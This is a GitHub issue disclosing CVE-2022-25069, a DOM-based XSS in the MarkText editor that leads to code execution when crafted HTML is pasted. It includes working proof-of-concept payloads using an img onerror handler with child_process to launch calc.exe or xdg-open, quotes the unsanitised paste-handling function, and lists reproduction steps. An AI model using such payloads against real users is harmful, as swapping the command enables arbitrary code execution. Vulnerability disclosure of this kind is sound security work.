CVE-2022-25069: Security issue: DOM based XSS & RCE - from pasting vulnerable HTML · Issue #2990 · marktext/marktext

Description

An attacker can induce Mark Text users to copy the HTML code below to execute a Remote Code Execution attack via XSS.

<!-- for windows --> <table><tr><img src onerror="require(‘child_process’).exec(‘calc.exe’)"></tr></table> <!-- for linux (tested with kali) --> <table><tr><img src onerror="require(‘child_process’).exec(‘xdg-open .’)"></tr></table>

The above code is inserted into the Mark Text as a DOM through the source code below, and the remote code execution is performed by calling child_process through the inline script.

ContentState.prototype.checkCopyType = function (html, text) {

let type = ‘normal’

if (!html && text) {

type = ‘copyAsMarkdown’

const match = /^<([a-zA-Z\d-]+)(?=\s|>).*?>[\s\S]+?<\/([a-zA-Z\d-]+)>$/.exec(text.trim())

if (match && match[1]) {

const tag = match[1]

if (tag === ‘table’ && match.length === 3 && match[2] === ‘table’) {

// Try to import a single table

const tmp = document.createElement(‘table’)

tmp.innerHTML = text

if (tmp.childElementCount === 1) {

return ‘htmlToMd’

}

}

// TODO: We could try to import HTML elements such as headings, text and lists to markdown for better UX.

type = PARAGRAPH_TYPES.find(type => type === tag) ? ‘copyAsHtml’ : type

}

}

return type

}

• Can you reproduce the issue?

Steps to reproduce

1. Copy the vulnerable HTML code
   • <table><tr><img src onerror="require('child_process').exec('calc.exe')"></tr></table>
2. Paste it into Mark Text app

Expected behavior:

HTML should be sanitized before pasted into DOM.

Actual behavior:

No HTML sanitize procedure. Only checks if it’s wrapped with <table> or not.

Link to an example: [optional]

bandicam.2022-02-08.01-33-25-900-cut.mp4 bandicam.2022-02-08.01-33-25-900.mp4Versions

• MarkText version: v0.16.3
• Operating system:
  Windows 11 Version 21H2 - OS Build 22000.469
  Kali Linux Kali GNU/Linux Rolling 2021.4